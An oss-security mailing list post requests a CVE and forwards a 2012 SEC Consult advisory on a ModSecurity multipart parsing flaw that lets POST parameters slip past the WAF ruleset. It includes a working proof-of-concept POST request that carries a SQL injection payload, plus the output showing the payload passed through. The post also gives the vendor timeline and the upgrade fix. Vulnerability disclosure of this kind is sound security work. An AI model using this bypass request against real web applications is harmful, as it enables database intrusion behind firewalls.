Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-Id: <201210171047.53032.mweckbecker@suse.de>
Date: Wed, 17 Oct 2012 10:47:52 +0200
From: Matthias Weckbecker <mweckbecker@...e.de>
To: oss-security@...ts.openwall.com
Subject: CVE request: Fwd: [Full-disclosure] SEC Consult SA-20121017-0 :: ModSecurity multipart/invalid part ruleset bypass

Hi Steve, Kurt, vendors,

this flaw looks slightly different from the last one and apparently has not
got a CVE yet. 

----------  Forwarded Message  ----------

Subject: [Full-disclosure] SEC Consult SA-20121017-0 :: ModSecurity 
multipart/invalid part ruleset bypass
Date: Wednesday 17 October 2012
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com

SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >
=======================================================================
              title: ModSecurity multipart/invalid part ruleset bypass
            product: ModSecurity
 vulnerable version: <= 2.6.8
      fixed version: 2.7.0
         CVE number: -
             impact: Depends what you use it for
           homepage: http://www.modsecurity.org/
              found: 2012-10-12
                 by: Bernhard Mueller
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
ModSecurity for Apache is a web server plug-in for the Apache web server
platform. This is the original, most mature and deployed ModSecurity module.
This module is maintained by the Trustwave SpiderLabs Research Team.

URL: http://www.modsecurity.org/projects/modsecurity/apache/


Vulnerability overview/description:
-----------------------------------
Validation of POST parameters can be bypassed on Apache/PHP installations by
sending specially formed multipart requests. A POST parameter's content can be
hidden from ModSecurity by prepending an invalid part. This first part
contains only a Content-Disposition header and has an additional carriage
return inserted at the end of the line ([\r\r\n]). This is followed by a
boundary in the next line and another Content-Disposition header with a
filename. The request content looks like this (newlines are all \r\n except in
line 2).

--A
Content-Disposition: form-data; name="id"[\r][\r][\n]
--A
Content-Disposition: form-data; name="lol"; filename="x"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

--A--

ModSecurity skips what it believes to be an invalid first part and proceeds to
parse the second part. This part is treated as a file and not checked against
the ruleset.

PHP however treats the whole thing as a single part and processes only the
first Content-Disposition header, ignoring the second one. In the opinion of
PHP this request contains a POST parameter with the name specified in the
first header.


Proof of concept:
-----------------

wut.php:
--------

<? echo $POST[xxx] ?>


POST request:
-------------

POST /wut.php HTTP/1.1
Content-Type: multipart/form-data; boundary=A
Content-Length: 161

--A
Content-Disposition: form-data; name="xxx"[\r][\r][\n]
--A
Content-Disposition: form-data; name="yyy"; filename="z"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

--A--


Output:
-------

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

(any change in the header should produce a 403)


Vulnerable / tested versions:
-----------------------------

This works with ModSecurity up to version 2.6.8.


Vendor contact timeline:
------------------------
2012-10-11: Contacted ModSecurity
2012-10-15: ModSecurity guys fixed it
2012-10-16: New ModSecurity release 2.7.0
2012-10-17: Public release of advisory


Solution:
---------
To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure
that the MULTIPART_INVALID_PART flag is set in the multipart strict validation
rule. Add the line:

IQ %{MULTIPART_INVALID_PART}, \

to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.

Download is available at:

http://www.modsecurity.org/download/



Advisory URL:
--------------
https://www.sec-consult.com/en/advisories.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The SEC Consult Group

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com


Office Singapore
4 Battery Road
#25-01 Bank of China Building
Singapore (049908)
Mail: office at sec-consult dot sg


Check out our blog at:
http://blog.sec-consult.com/


And this thing here:
http://wordpress.org/extend/plugins/mvis-security-center/


EOF B. Mueller / October 2012

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-------------------------------------------------------

-- 
Matthias Weckbecker, Senior Security Engineer, SUSE Security Team
SUSE LINUX Products GmbH, Maxfeldstr. 5, D-90409 Nuernberg, Germany
Tel: +49-911-74053-0;  http://suse.com/
SUSE LINUX Products GmbH, GF: Jeff Hawn, HRB 16746 (AG Nuernberg)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.